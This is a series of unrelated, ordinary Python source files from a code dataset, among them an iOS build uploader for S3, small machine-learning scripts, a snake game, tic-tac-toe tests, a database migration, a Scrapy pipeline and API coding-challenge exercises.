zipfile.ZipFile(build_filename)\n\n for name in zfile.namelist():\n if name.endswith('Info.plist'):\n zfile.extract(name, 'temp')\n shutil.move('temp/'+name, 'temp/Info.plist')\n shutil.rmtree('temp/Payload')\n\n info = plistlib.load( open('temp/Info.plist', 'rb') )\n\n bundle_name = info['CFBundleName']\n bundle_identifier = info['CFBundleIdentifier']\n bundle_version = info['CFBundleVersion']\n\n\n # ---- Determine which build # this is by the number of existing builds\n\n conn = tinys3.Connection(cnfg['s3_access_key'], cnfg['s3_secret_key'])\n\n uploaded_builds = conn.list(\n 'b/'+bundle_name+'-'+bundle_version,\n cnfg['bucket_name']\n )\n\n b_num = 1\n for x in uploaded_builds:\n b_num += 1\n\n build_number = 'b{0}'.format(b_num)\n\n\n # ---- Generate filenames from extracted information\n\n # Ex: 'AppName-2.0-b5.ipa'\n bd_filename = bundle_name+'-'+bundle_version+'-'+build_number+'.ipa'\n\n # Ex: 'manifest-2.0-b5.plist'\n mn_filename = 'manifest-'+bundle_version+'-'+build_number+'.plist'\n\n\n # ---- Create manifest.plist file from template\n # {0} - URL to .ipa\n # {1} - Bundle identifier\n # {2} - Bundle version\n # {3} - Bundle name\n\n template_file = open('manifest-template', 'r')\n\n manifest_data = template_file.read().format(\n 'https://s3.amazonaws.com/'+cnfg['bucket_name']+'/b/'+bd_filename,\n bundle_identifier,\n bundle_version,\n bundle_name\n )\n template_file.close()\n\n manifest_file = open('temp/manifest.plist', 'w')\n manifest_file.write(manifest_data)\n manifest_file.close()\n\n\n # ---- Upload build and manifest to S3\n\n print('\\nUploading build...')\n\n build_file = open(build_filename, 'rb')\n r = conn.upload(bd_filename, build_file, cnfg['bucket_name']+'/b')\n\n if r.status_code != 200:\n print('Error: Build upload unsuccessful (Status code {0)'\\\n .format(r.status_code))\n shutil.rmtree('temp')\n return\n\n print('Uploading manifest...')\n\n manifest_file = open('temp/manifest.plist', 'rb')\n r = conn.upload(mn_filename, manifest_file, cnfg['bucket_name']+'/m')\n\n if r.status_code != 200:\n print('Error: Manifest upload unsuccessful (Status code {0)'\\\n .format(r.status_code))\n # Try to clean up\n conn.delete(bd_filename, cnfg['bucket_name']+'/b')\n shutil.rmtree('temp')\n return\n\n\n # ---- Clean up and finish\n\n shutil.rmtree('temp')\n\n print('\\nUpload successful! ({0})\\n'.format(bd_filename))\n\n aws = 'https://s3.amazonaws.com/'\n b_url = aws+cnfg['bucket_name']+'/b/'+bd_filename\n m_url = aws+cnfg['bucket_name']+'/m/'+mn_filename\n\n print('-'*32)\n print('Build : {0}'.format(b_url))\n print('Manifest : {0}'.format(m_url))\n\n itms = '\\nitms-services://?action=download-manifest&url={0}'\n print(itms.format(m_url))\n print('-'*32+'\\n')\n\n\nif __name__ == '__main__':\n\n import sys\n\n if len(sys.argv) == 2:\n build_path = sys.argv[1]\n main(build_path)\n else:\n print('\\nUsage:\\n\\tios-dist.py {filename or path to build}\\n')\n\n","sub_path":"ios-s3-dist.py","file_name":"ios-s3-dist.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290453117","text":"from __future__ import absolute_import\n\nimport sys\nfrom . import process_bar\n\n\ndef train_model(\n sess, optimizer, loss,\n X_tensor, Y_tensor,\n X_train, Y_train,\n X_valid, Y_valid,\n iterations, batch_size=-1):\n num_examples = len(X_train)\n if batch_size < 0:\n batch_size = num_examples\n num_batch = int((num_examples - 1) / batch_size) + 1\n for iter in range(iterations):\n for batch in range(num_batch):\n indexes = [i % num_examples\n for i in range(batch * batch_size,\n (batch + 1) * batch_size)]\n\n bar = process_bar.process_bar(iter, iterations)\n # train batch\n feed_train = {X_tensor: X_train[indexes],\n Y_tensor: Y_train[indexes]}\n train_loss, _ = sess.run([loss, optimizer], feed_dict=feed_train)\n\n # valid\n feed_valid = {X_tensor: X_valid,\n Y_tensor: Y_valid}\n valid_loss = sess.run(loss, feed_dict=feed_valid)\n\n train_loss_str = \"%.4f\" % train_loss\n valid_loss_str = \"%.4f\" % valid_loss\n\n bar += ' Train Loss:' + train_loss_str +\\\n ' Valid Loss:' + valid_loss_str + '\\r'\n sys.stdout.write(bar)\n sys.stdout.flush()\n sys.stdout.write('\\n')\n sys.stdout.flush()\n","sub_path":"backend/utils/simple_train.py","file_name":"simple_train.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361631952","text":"# Introduction to Python Regular Expressions\n\n# Importing Libraries\nimport re\n\npattern1 = \"abcd\"\npattern1 = \"9876 efg 98\"\n#pattern1 = \"a\"\n\nprint(\"Occurences of any character: \",re.match(r\".+\",pattern1)) \n#. matches every character\n# .* 0 or more, .+ one or more\nprint(\"Occurences of A_Za-z: \",re.search(r\"[a-z]+\",pattern1))\nprint(\"Occurences of ab*: \",re.search(r\"ab?\",pattern1))\n\nif re.match(r\"[a-z]+\",pattern1) != None:\n print(\"Match!\")\nelse:\n print(\"No Match!\")\n \n \n####################\n\n\nsentence=\"I was born in USA, in 1996\"\n\nre.sub(r\"\\d\",\"\",sentence)\n# 'I was born in USA, in '\n\nre.sub(r\"\\d\",\"XXXX\",sentence)\n# 'I was born in USA, in XXXXXXXXXXXXXXXX'\n\nre.sub(r\"\\d\",\"X\",sentence)\n# 'I was born in USA, in XXXX'\n\n#####################################\n\nsentence=\"ab\" # try \"a\" \"abb\" \"abbbbbb\"\nre.match(\"ab?\",sentence) #a followed by no b or one b","sub_path":"Section 4 - Regular Expression/regex1.py","file_name":"regex1.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"356064457","text":"# coding=utf8\nfrom setuptools import find_packages\nfrom setuptools import setup\nimport os\n\nversion = '0.0.1.dev0'\n\nsetup(\n name='{{cookiecutter.namespace}}.{{cookiecutter.package}}',\n version=version,\n description='{{cookiecutter.description}}',\n long_description=(\n open('README.txt').read() + '\\n\\n' +\n open(os.path.join('docs', 'HISTORY.txt')).read()\n ),\n # Get more strings from\n # http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Framework :: Plone',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords='{{cookiecutter.package}}',\n author='{{cookiecutter.author}}',\n author_email='{{cookiecutter.email}}',\n url='{{cookiecutter.url}}',\n license='{{cookiecutter.license}}',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['{{cookiecutter.namespace}}'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'Products.CMFPlone',\n 'plone.api',\n 'setuptools',\n 'z3c.autoinclude',\n 'five.grok',\n 'plone.app.dexterity [grok]',\n 'plone.namedfile [blobs]',\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n ]\n },\n entry_points='''\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n ''',\n)\n","sub_path":"{{cookiecutter.namespace}}.{{cookiecutter.package}}/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462467792","text":"from branch.models import Branches\nfrom restapi.connection import DBConnection\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom branch.utils import get_branches_payload\nimport uuid\n\n\nclass BranchImplementation:\n def __init__(self, requests):\n self.requests = requests\n\n # create branches\n def create_branches(self):\n payload = []\n count = 0\n try:\n branches_to_create = self.requests.get(\"branches\", None)\n with DBConnection() as session:\n for branch in branches_to_create:\n _id = str(uuid.uuid4())\n try:\n new_branch = Branches(\n branch_id=_id,\n branch_name=branch['branch_name']\n )\n session.add(new_branch)\n session.commit()\n payload.append({\"branch_id\": _id, \"message\": \"Branch added successfully.\"})\n count += 1\n except SQLAlchemyError as e:\n print(e)\n payload.append({\"branch_id\": _id, \"message\": str(e._message).split(\": \")[1].split(\"\\\\\")[0]})\n session.rollback()\n except Exception as e:\n print(e)\n raise e\n finally:\n return payload, str(count) + \" branch created.\"\n\n # get branches\n def get_branches(self):\n payload = []\n count = 0\n try:\n branches_to_find = self.requests.get(\"branches\", None)\n with DBConnection() as session:\n if len(branches_to_find):\n for branch in branches_to_find:\n query = session.query(Branches).filter(Branches.branch_id == branch)\n data = query.all()\n if data:\n payload1, message, count = get_branches_payload(data, count)\n payload.append(payload1[0])\n else:\n payload.append({\"branch_id\": branch, \"message\": \"Branch doesn't exists.\"})\n message = str(count) + \" branch fetched.\"\n else:\n query = session.query(Branches)\n data = query.all()\n payload, message, count = get_branches_payload(data, count)\n except Exception as e:\n print(e)\n raise e\n return payload, message\n\n # update branches\n def update_branches(self):\n payload = []\n count = 0\n try:\n branches_to_update = self.requests.get(\"branches\", None)\n with DBConnection() as session:\n for branch in branches_to_update:\n columns_to_update = {\n Branches.branch_name: branch[\"update_data\"][\"branch_name\"]\n }\n try:\n query = session.query(Branches).filter(Branches.branch_id == branch['branch_id']) \\\n .update(columns_to_update, synchronize_session=False)\n session.commit()\n if query:\n count += 1\n payload.append({\"branch_id\": branch['branch_id'], \"message\": \"Branch updated successfully.\"})\n else:\n payload.append({\"branch_id\": branch['branch_id'], \"message\": \"Branch doesn't exist.\"})\n\n except SQLAlchemyError as e:\n print(e)\n payload.append(\n {\"branch_id\": branch['branch_id'], \"message\": str(e._message).split(\": \")[1].split(\"\\\\\")[0]})\n session.rollback()\n except Exception as e:\n print(e)\n raise e\n return payload, str(count) + \" branch updated.\"\n\n # delete branches\n def delete_branches(self):\n payload = []\n count = 0\n try:\n branches_to_delete = self.requests.get('branches', None)\n with DBConnection() as session:\n for branch in branches_to_delete:\n query = session.query(Branches).filter(Branches.branch_id == branch) \\\n .delete(synchronize_session=False)\n if query:\n count += 1\n payload.append({\"branch_id\": branch, \"message\": \"Branch deleted successfully.\"})\n session.commit()\n else:\n payload.append({\"branch_id\": branch, \"message\": \"Branch doesn't exists.\"})\n except Exception as e:\n print(e)\n raise e\n return payload, str(count) + \" branch deleted.\"\n","sub_path":"branch/implementation/implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145707945","text":"from tkinter import *\nimport time\n\n\nL = 600\nBORDER = L/40.0\ninnerL = L - 2*BORDER\nN = 40\na = innerL/N\ndifficulty = 1\ngameover= True\n\n\ndef cmp(a,b):\n\treturn\t(a > b) - (a < b)\n\n\ndef create_background(master):\n\tbgCanvas = Canvas(master, width=L, height=L,bg=\"black\")\n\tbgCanvas.pack()\n\tbgCanvas.create_rectangle(BORDER,BORDER, L-BORDER, L-BORDER,fill=\"white\")\n\tbgCanvas.create_rectangle(2*BORDER,2*BORDER, L-2*BORDER, L-2*BORDER,fill=\"black\")\n\treturn bgCanvas\n\n\ndef black_canvas(master):\n\tbgCanvas.create_rectangle(2*BORDER,2*BORDER, L-2*BORDER, L-2*BORDER,fill=\"black\")\n\n\n#Creo rettangolo con il reticolo!\nclass Rectangle():\n\tdef __init__(self,canvas, coords , color=\"white\"): \n\t#\tprint(coords)\n\t\tcoord = tuple([a*el-a/2 for el in coords])+tuple([a*el +a/2for el in coords])\n\t\tself.coord = coord\n\t\tself.color = color \n\t\tself.id = canvas.create_rectangle(*coord, fill=self.color)\n\n\nclass Point:\n\tdef __init__(self,*x):\n\t#\tprint (x)\n\t\tself.x=x[0]\n\t\tself.y=x[1]\n\n\tdef coord(self):\n\t\treturn (self.x,self.y)\n\ndef equal(a,b):\n\ti=0\n\tif (len(a) == len(b)):\n\t\tfor i in range(len(a)):\n\t\t\ti+= (a[i] - b[i])\n\treturn (not bool(i))\n\nclass Snake:\n\tdef __init__(self,canvas,master):\n\t\tself.body = []\n\t\tself.canvas = canvas\n\t\tself.master = master \n\t\tinit_snake = []\n\t\tself.direction = Point(0,1)\n\t\tfor i in range(4):\n\t\t\ttemp_coord = (N//2,N//2-i )\n\t\t\tinit_snake.append(Point(*temp_coord))\n\t\tfor i in range(len(init_snake)):\n\t\t\tself.body.append([init_snake[i], Rectangle( canvas, init_snake[i].coord() ) ] )\n\t\t#unit vector for the direction of movement\n\t\t\n\tdef update_snake(self):\n\t\tself.canvas.delete(self.body[-1][1].id)\n\t\tself.body.pop()\n\t\thead = self.body[0][0]\n\t\tnew_coord = (self.direction.x+head.x,self.direction.y+head.y)\n\t\tif ( max(new_coord) > N or min(new_coord) < 0 ):\n\t\t\tprint(\"gameover\")\n\t\t\tself.master.quit()\n\t\tself.body.insert(0,[Point(*new_coord),Rectangle(self.canvas, new_coord)])\n\t\tself. master.after(100, self.update_snake )\n\n\n\tdef leftKey(self,event):\n\t\tself.direction=Point(-1,0)\n\t\tprint (\"pressed left\")\n\tdef rightKey(self,event):\n\t\tself.direction=Point(1,0)\n\t\tprint (\"pressed right\")\n\tdef upKey(self,event):\n\t\tself.direction=Point(0,-1)\n\t\tprint (\"pressed up \")\n\tdef downKey(self,event):\n\t\tself.direction=Point(0,1)\n\t\tprint (\"pressed down\")\n\n\n\nif __name__ == \"__main__\":\n\tmaster = Tk();\n\tbgCanvas = create_background(master)\n\tsnake=Snake(bgCanvas,master)\n\tmaster.bind(\"\",snake.leftKey)\n\tmaster.bind(\"\",snake.rightKey)\n\tmaster.bind(\"\",snake.upKey)\n\tmaster.bind(\"\",snake.downKey)\n\tsnake.update_snake()\n\tbgCanvas.mainloop()\n","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59107294","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef create_toy_data(func, sample_size, std):\n x = np.linspace(0, 1, sample_size)\n t = func(x) + np.random.normal(scale=std, size=x.shape)\n return x, t\n\ndef func(x):\n return np.sin(2 * np.pi * x)\n\n\nx_train, y_train = create_toy_data(func, 10, 0.25)\nx_test = np.linspace(0, 1, 100)\ny_test = func(x_test)\n\n#scatter()绘制散点图\nplt.scatter(x_train, y_train, facecolor=\"none\", edgecolors=\"b\", s=50, label=\"training data\")\nplt.plot(x_test, y_test, c=\"g\", label=\"$\\sin(2\\pi x)$\")\nplt.legend()\nplt.show()\n","sub_path":"practice/ch01_Introduction.py","file_name":"ch01_Introduction.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"348421983","text":"\"\"\"\nMigration script to add the tool_dependency table.\n\"\"\"\n\nimport datetime\nimport logging\n\nfrom sqlalchemy import (\n Boolean,\n Column,\n DateTime,\n ForeignKey,\n Integer,\n MetaData,\n Table\n)\n\nfrom galaxy.model.custom_types import TrimmedString\nfrom galaxy.model.migrate.versions.util import (\n create_table,\n drop_table\n)\n\nlog = logging.getLogger(__name__)\nnow = datetime.datetime.utcnow\nmetadata = MetaData()\n\n# New table to store information about cloned tool shed repositories.\nToolDependency_table = Table(\"tool_dependency\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"create_time\", DateTime, default=now),\n Column(\"update_time\", DateTime, default=now, onupdate=now),\n Column(\"tool_shed_repository_id\", Integer, ForeignKey(\"tool_shed_repository.id\"), index=True, nullable=False),\n Column(\"installed_changeset_revision\", TrimmedString(255)),\n Column(\"name\", TrimmedString(255)),\n Column(\"version\", TrimmedString(40)),\n Column(\"type\", TrimmedString(40)),\n Column(\"uninstalled\", Boolean, default=False))\n\n\ndef upgrade(migrate_engine):\n print(__doc__)\n metadata.bind = migrate_engine\n metadata.reflect()\n\n create_table(ToolDependency_table)\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n metadata.reflect()\n\n drop_table(ToolDependency_table)\n","sub_path":"lib/galaxy/model/migrate/versions/0099_add_tool_dependency_table.py","file_name":"0099_add_tool_dependency_table.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471970640","text":"\"\"\"\nThis file demonstrates two different styles of tests (one doctest and one\nunittest). These will both pass when you run \"manage.py test\".\n\nReplace these with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\n\nfrom models import Player, Game\n\nclass TicTacToeTest(TestCase):\n def __playGame(self):\n player1 = Player(name=\"player1\")\n player2 = Player(name=\"player2\")\n game = Game(player1=player1, player2=player2)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n return game\n\n def __translateBoard(self, board):\n transBoard = []\n for piece in board:\n if piece == 'O':\n transBoard.append(Game.O)\n elif piece == 'X':\n transBoard.append(Game.X)\n else:\n transBoard.append(Game.EMPTY)\n\n return transBoard\n\n def __setupGame(self, startingBoard, turns):\n startingBoard = self.__translateBoard(startingBoard)\n player1 = Player(name=\"player1\")\n player2 = Player(name=\"player2\")\n game = Game(player1=player1, player2=player2)\n game.board = startingBoard\n game.turn = turns\n return game\n\n def test_3GamesToDraw(self):\n \"\"\"\n Simply play three games with computer X and O moves, and make\n sure nobody wins.\n \"\"\"\n game1 = self.__playGame()\n self.assertEqual(filter(lambda x: x==0, game1.board), [])\n self.assertFalse(game1.checkWinner(game1.X))\n self.assertFalse(game1.checkWinner(game1.O))\n self.assertEqual(sum(game1.board), 5*Game.X + 4*Game.O,\n \"Not all spaces are filled\")\n\n game2 = self.__playGame()\n self.assertEqual(filter(lambda x: x==0, game2.board), [])\n self.assertFalse(game2.checkWinner(game2.X))\n self.assertFalse(game2.checkWinner(game2.O))\n self.assertEqual(sum(game2.board), 5*Game.X + 4*Game.O,\n \"Not all spaces are filled\")\n\n game3 = self.__playGame()\n self.assertEqual(filter(lambda x: x==0, game3.board), [])\n self.assertFalse(game3.checkWinner(game3.X))\n self.assertFalse(game3.checkWinner(game3.O))\n self.assertEqual(sum(game3.board), 5*Game.X + 4*Game.O,\n \"Not all spaces are filled\")\n\n\n def test_fillCornerAsFirstMove(self):\n \"\"\"\n Following the logic of the game, the first move should be a corner\n move.\n \"\"\"\n turn = 0\n startingBoard = ['_', '_', '_',\n '_', '_', '_',\n '_', '_', '_',]\n\n game = self.__setupGame(startingBoard, turn)\n game.nextTurn(Game.X)\n\n # Just make sure there is only one X in one of the random corners\n self.assertEqual(sum(game.board[i] for i in Game.CORNERS), Game.X)\n\n\n def test_fillCenterAsSecondMove(self):\n \"\"\"\n Following the logic of the game, if the opponent has made their\n first move in a corner, then the second move should be in the center.\n \"\"\"\n turn = 1\n startingBoard = ['X', '_', '_',\n '_', '_', '_',\n '_', '_', '_',]\n\n expected = self.__translateBoard(['X', '_', '_',\n '_', 'O', '_',\n '_', '_', '_'])\n\n game = self.__setupGame(startingBoard, turn)\n game.nextTurn(Game.O)\n self.assertEqual(game.board, expected)\n\n\n def test_winBeforeBlock(self):\n \"\"\"\n The computer move should win the game before blocking. Also,\n the nextTurn() method should return True, since this move produced\n a winner, and the checkWin() method should return true for X, but\n false for O.\n\n Starting board:\n O O _\n X X _\n _ _ _\n\n It's the X player's turn. It should win the game as such:\n O O _\n X X X\n _ _ _\n\n \"\"\"\n startingBoard = ['O', 'O', '_',\n 'X', 'X', '_',\n '_', '_', '_']\n\n expected = self.__translateBoard(['O', 'O', '_',\n 'X', 'X', 'X',\n '_', '_', '_'])\n\n # Setup a fake game\n game = self.__setupGame(startingBoard, 4)\n\n # make sure the \"AI\" wins\n win = game.nextTurn(Game.X)\n self.assertEqual(game.board, expected)\n self.assertTrue(win)\n self.assertTrue(game.checkWinner(game.X))\n self.assertFalse(game.checkWinner(game.O))\n\n def test_blockWin(self):\n \"\"\"\n Block a potential win before a fork. Starting board:\n O _ X\n _ X _\n O _ _\n\n The computer should block the potential win by putting an X\n between the two O's. There is a potential fork by placing an X\n in the empty spot to the right of the X, but that would mean the\n O's could win.\n \"\"\"\n startingBoard = ['O', '_', 'X',\n '_', 'X', '_',\n 'O', '_', '_']\n\n expected = self.__translateBoard(['O', '_', 'X',\n 'X', 'X', '_',\n 'O', '_', '_'])\n\n # Setup a fake game\n game = self.__setupGame(startingBoard, 4)\n\n # make a move and make sure the AI blocked instead forked\n game.nextTurn(Game.X)\n self.assertEqual(game.board, expected)\n\n\n def test_forkBeforePlayingCenter(self):\n \"\"\"\n In this test, the center is open, but there is an opportunity to\n fork the board (i.e., give the AI two chances to win the game)\n \"\"\"\n startingBoard = ['X', 'O', '_',\n '_', '_', 'O',\n '_', 'X', '_']\n\n expected = self.__translateBoard(['X', 'O', '',\n '_', '_', 'O',\n 'X', 'X', '_'])\n\n # Setup a fake game\n game = self.__setupGame(startingBoard, 4)\n\n game.nextTurn(Game.X)\n self.assertEqual(game.board, expected)\n\n\n","sub_path":"mm_tictactoe/tictactoe/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233119834","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statistics import median\n\n# democrat = 0, republican = 1\n\ndataset = pd.read_csv('Parliment-1984.csv')\nX = dataset.iloc[:, 1:].values\ny = dataset.iloc[:, 0].values\n\nfor i in range(0,434):\n if y[i] == 'democrat':\n y[i] = 0\n elif y[i] == 'republican':\n y[i] = 1\ny = y.astype(int)\n\nfor a in range(0, 434):\n for b in range(0,16):\n if ('y' in X[a][b]):\n X[a][b] = 1\n elif ('n' in X[a][b]):\n X[a][b] = 0\n \nmedians = []\nfor x in range(0, 16):\n acceptable = []\n for z in range(0,434):\n if((X[z][x] == 1) or (X[z][x] == 0)):\n acceptable.append(X[z][x])\n med = median(acceptable)\n medians.append(int(med))\n \nfor c in range(0, 434):\n for d in range(0,16):\n if ((X[c][d] != 1) and (X[c][d] != 0)):\n X[c][d] = medians[d]\n \nX = X.astype(int)\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2)\n\nfrom sklearn.svm import SVC\nclassifier = SVC(kernel = 'rbf')\nclassifier.fit(X_train, y_train)\n\ny_pred = classifier.predict(X_test)\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\nfrom sklearn.metrics import f1_score\nf1_score(y_test, y_pred, average='binary') \n# F1 score is approximately 0.95","sub_path":"classifier-kernel_svm.py","file_name":"classifier-kernel_svm.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646153971","text":"# Copyright (c) 2017, Riverbank Computing Limited\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\nimport argparse\n\nfrom . import MessageHandler, PYQTDEPLOY_RELEASE, Sysroot, UserException\n\n\ndef main():\n \"\"\" The entry point for the setuptools generated pyqtdeploy-sysroot\n wrapper.\n \"\"\"\n\n # Parse the command line.\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--no-clean',\n help=\"do not remove the temporary build directory to make debugging package plugins easier\",\n action='store_true')\n parser.add_argument('--options',\n help=\"show the options available for the packages\",\n action='store_true')\n parser.add_argument('--package', help=\"the package name to build\",\n action='append')\n parser.add_argument('--plugin-path',\n help=\"the directories searched for package plugins\",\n metavar=\"PATH\")\n parser.add_argument('--apple-sdk',\n help=\"the SDK to use for Apple targets\", metavar=\"SDK\"),\n parser.add_argument('--source-dir',\n help=\"the default directory containing the source archives\",\n metavar=\"DIR\")\n parser.add_argument('--sysroot', help=\"the system image root directory\",\n metavar=\"DIR\")\n parser.add_argument('--target', help=\"the target platform\"),\n parser.add_argument('--quiet', help=\"disable progress messages\",\n action='store_true')\n parser.add_argument('--verbose', help=\"enable verbose progress messages\",\n action='store_true')\n parser.add_argument('-V', '--version', action='version',\n version=PYQTDEPLOY_RELEASE)\n parser.add_argument('json',\n help=\"JSON specification of the system image root directory\")\n\n args = parser.parse_args()\n\n # Perform the required action.\n message_handler = MessageHandler(args.quiet, args.verbose)\n\n try:\n sysroot = Sysroot(args.sysroot, args.json, args.plugin_path,\n args.source_dir, args.apple_sdk, args.target, message_handler)\n\n if args.options:\n sysroot.show_options(args.package)\n else:\n sysroot.build_packages(args.package, args.no_clean)\n except UserException as e:\n message_handler.exception(e)\n return 1\n\n return 0\n","sub_path":"pyqtdeploy/pyqtdeploysysroot_main.py","file_name":"pyqtdeploysysroot_main.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137340993","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom twisted.enterprise import adbapi\nimport pymysql\n\nclass CaifuPipeline(object):\n def process_item(self, item, spider):\n return item\n\nclass TwiPipeline(object):\n def __init__(self,dbpool,insert_sql):\n self.dbpool = dbpool\n self.insert_sql = insert_sql\n @classmethod\n def from_settings(cls, settings):\n dbparms = dict(\n host=settings[\"MYSQL_HOST\"],\n db=settings[\"MYSQL_DBNAME\"],\n user=settings[\"MYSQL_USER\"],\n passwd=settings[\"MYSQL_PASSWORD\"],\n\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor,\n use_unicode=True,\n )\n dbpool = adbapi.ConnectionPool(\"pymysql\", **dbparms)\n insert_sql = settings['insert_sql'],\n return cls(dbpool,insert_sql)\n\n def process_item(self, item, spider):\n # 使用twisted将mysql插入变成异步执行\n query = self.dbpool.runInteraction(self.do_insert, item)\n query.addErrback(self.handle_error, item, spider) # 处理异常\n\n def handle_error(self, failure, item, spider):\n # 处理异步插入的异常\n print(failure)\n\n def do_insert(self, cursor, item):\n # 执行具体的插入\n # 根据不同的item 构建不同的sql语句并插入到mysql中\n # insert_sql, params = item.get_insert_sql()\n # print(insert_sql, params)\n # insert_sql = \"\"\"INSERT into code(code_num,code_name) VALUES(%s, %s) \"\"\"\n\n cursor.execute(self.insert_sql, (item['code_num'],item['code_name']))","sub_path":"dongcai/dongcai/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513914639","text":"#!/bin/python3\n\nimport requests\nimport json\n\n# Program to retrieve a JSON with a string and array of strings and return\n# from the answer to Code2040's API\n# Author: Elias G\n# Version: 1.11.16 (still a lil spooky bc it's early)\n\n# Summary: Sends a post HTTP request to get a JSON containing a string,\n# \"needle\", and an array, \"Haystack\", that contains the needle. It then finds\n# the index of the needle and returns the answer to the API in a JSON POST.\n\npost = {'token': '226490285c84885034cc6ff003f6d57a'}\nurlGetString = \"http://challenge.code2040.org/api/haystack\"\nurlGetValidation = \"http://challenge.code2040.org/api/haystack/validate\"\n\napiResponse = requests.post(urlGetString, post)\n\napiResponse = apiResponse.json()\nneedle = apiResponse[\"needle\"]\nhayStack = apiResponse[\"haystack\"]\n\n# testing outputs before moving on\n# print(type(needle))\n# print(needle)\n# print(hayStack)\n# index = hayStack.index(needle)\n\npost[\"needle\"] = hayStack.index(needle)\napiResponse = requests.post(urlGetValidation, post)\n","sub_path":"needleInAHaystackAPI.py","file_name":"needleInAHaystackAPI.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569080932","text":"\"\"\"\npicture.py\nAuthor: Claire Adner\nCredit: none\nAssignment:\nUse the ggame library to \"paint\" a graphical picture of something (e.g. a house, a face or landscape).\nUse at least:\n1. Three different Color objects.\n2. Ten different Sprite objects.\n3. One (or more) RectangleAsset objects.\n4. One (or more) CircleAsset objects.\n5. One (or more) EllipseAsset objects.\n6. One (or more) PolygonAsset objects.\nSee:\nhttps://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Displaying-Graphics\nfor general information on how to use 